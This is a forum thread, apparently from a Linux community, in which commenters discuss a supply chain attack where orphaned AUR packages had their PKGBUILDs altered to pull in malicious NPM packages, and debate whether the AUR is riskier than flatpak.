I guess the same could be said for literally any open source or freely distributed project.
The difference is that this was a supply chain attack and, to my knowledge, required the package to be listed as orphaned unmaintained first so that the PKGBUILD could be modified to install malicious NPM packages.
The community caught it quickly because it is possible to read both the PKGBUILD and the output of the update and, I think, it is fully resolved as of now.
Basically, if one were to delete or replace orphaned packages then they wouldn’t have been infected.
It is also possible to add a CVE scanner for AUR packages if reading the PKGBUILD is too much, I’m looking into how to do that now.
All this is to say that you should check if you had an infected package but I personally don’t think using the aur is more risky than using a flatpak.
Waiting for updating doesn’t make any difference. The packages could be infected at any point.
I guess the same could be said for literally any open source or freely distributed project.
The difference is that this was a supply chain attack and, to my knowledge, required the package to be listed as
orphanedunmaintained first so that the PKGBUILD could be modified to install malicious NPM packages.The community caught it quickly because it is possible to read both the PKGBUILD and the output of the update and, I think, it is fully resolved as of now.
Basically, if one were to delete or replace orphaned packages then they wouldn’t have been infected.
It is also possible to add a CVE scanner for AUR packages if reading the PKGBUILD is too much, I’m looking into how to do that now.
All this is to say that you should check if you had an infected package but I personally don’t think using the aur is more risky than using a flatpak.
Are linux users allowed to juat lie like that? I thought if you do that you need to use Windows.
What?
C’mon, man, at least pour one out for the homies who waited to update and landed in the period where it was live and undisclosed.